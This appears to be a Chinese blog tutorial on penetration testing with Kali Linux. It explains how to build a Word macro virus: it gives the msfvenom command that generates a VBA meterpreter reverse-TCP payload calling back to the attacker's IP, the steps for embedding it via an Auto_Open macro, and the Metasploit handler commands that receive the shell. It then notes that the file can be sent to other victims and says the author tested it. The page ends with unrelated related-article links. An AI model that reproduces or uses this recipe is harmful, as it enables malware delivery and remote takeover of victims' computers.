Kali渗透测试:使用Word宏病毒进行渗透攻击

简介: Kali渗透测试:使用Word宏病毒进行渗透攻击

Kali渗透测试:使用宏病毒进行渗透攻击
VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。

构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或直接删除其他文件等。Word宏和其他样式存储在模版DOT文件中, 因此总是把Word文件转成模版,再将其存储为宏。

实 验 环 境
攻击机:Linux kali 5.10.0 IP: 192.168.68.125

靶机:IE11-Win81

操 作 步 骤
1. 使用msfvenom生成VBA被控端
在Kali Linux中使用msfvenom命令生成一个VBA类型的被控端,输入如下命令:

┌──(root💀kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.68.125 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

该被控端可以分为两个部分。第一个部分是包括Auto_Open在内的几个函数,如下图所示:
image.png
image.png

第二部分是一些字符形式的攻击载荷,如下图所示:

image.png

2. 使用Word制作宏文件
使用Word将上图所示 两个部分制作成可以使用的宏文件。进入装有Office的Windows系统的靶机,然后打开Word(本人使用的是2007版),单击“开发工具”,接着在工具栏单击“宏”,就会弹出一个“宏”对话框,如下图所示:

image.png

起一个宏名,然后单击“创建”按钮,打开宏编辑界面,将我们在Kali 中生成的第一部分,也就是包括Auto_Open在内的几个函数复制到Normal-NewMacros中,覆盖原来的内容。如下图所示:

image.png

然后在工具栏上单击编辑图标,返回到Word操作界面,如下图所示:

image.png

在Word操作界面中,粘贴在KaliLinux中生成的第二部分,也就是字符形式的攻击载荷部分,如下图所示:
image.png

完成之后,将该木马文件保存,如下图所示:

image.png

3. 在Kali中启动metasploit
进入metasploit,启动和设置payload并执行,命令如下:

msf6 > use exploit/multi/handler
.....
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
.....
msf6 exploit(multi/handler) > set lhost 192.168.68.125
.....
msf6 exploit(multi/handler) > set lport 4444
.....
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.68.125:4444

image.png

4. 执行宏病毒文件
现在在靶机Win8中直接双击桌面上这个生成的木马文件(上图红框所示),在Kali中可以看到获得控制权限。如下图所示:

image.png

在会话界面,执行pwd命令,dir命令 ,结果如下图所示:

image.png

如果把宏病毒文件发给其他受害者,当受害者打开这个文件,里面的恶意HTA文件就会执行。在Kali中同样会得到控制权。在此不再赘述,本人已经亲测有效。

相关文章
|
4月前
|
安全 NoSQL Shell
web渗透-SSRF漏洞及discuz论坛网站测试
SSRF(服务器端请求伪造)是一种安全漏洞,攻击者可诱使服务端发起任意请求,进而探测或攻击内网系统。常用于端口扫描、访问内部服务、读取本地文件等。常见防御包括限制协议、域名和IP,但可通过302跳转、短地址等方式绕过。
289 1
web渗透-SSRF漏洞及discuz论坛网站测试
|
4月前
|
存储 安全 Linux
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
659 0
|
7月前
|
存储 安全 Linux
Kali Linux 2025.2 发布 (Kali 菜单焕新、BloodHound CE 和 CARsenal) - 领先的渗透测试发行版
Kali Linux 2025.2 发布 (Kali 菜单焕新、BloodHound CE 和 CARsenal) - 领先的渗透测试发行版
441 0
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
网络协议 安全 Linux
Kali渗透测试:拒绝服务攻击(一)
Kali渗透测试:拒绝服务攻击(一)
757 2
|
存储 网络协议 安全
Kali渗透测试:拒绝服务攻击(二)
Kali渗透测试:拒绝服务攻击(二)
992 0
|
数据可视化 前端开发 测试技术
接口测试新选择:Postman替代方案全解析
在软件开发中,接口测试工具至关重要。Postman长期占据主导地位,但随着国产工具的崛起,越来越多开发者转向更适合中国市场的替代方案——Apifox。它不仅支持中英文切换、完全免费不限人数,还具备强大的可视化操作、自动生成文档和API调试功能,极大简化了开发流程。
|
7月前
|
Java 测试技术 容器
Jmeter工具使用:HTTP接口性能测试实战
希望这篇文章能够帮助你初步理解如何使用JMeter进行HTTP接口性能测试,有兴趣的话,你可以研究更多关于JMeter的内容。记住,只有理解并掌握了这些工具,你才能充分利用它们发挥其应有的价值。+
1179 23
|
9月前
|
SQL 安全 测试技术
2025接口测试全攻略:高并发、安全防护与六大工具实战指南
本文探讨高并发稳定性验证、安全防护实战及六大工具(Postman、RunnerGo、Apipost、JMeter、SoapUI、Fiddler)选型指南,助力构建未来接口测试体系。接口测试旨在验证数据传输、参数合法性、错误处理能力及性能安全性,其重要性体现在早期发现问题、保障系统稳定和支撑持续集成。常用方法包括功能、性能、安全性及兼容性测试,典型场景涵盖前后端分离开发、第三方服务集成与数据一致性检查。选择合适的工具需综合考虑需求与团队协作等因素。
1522 24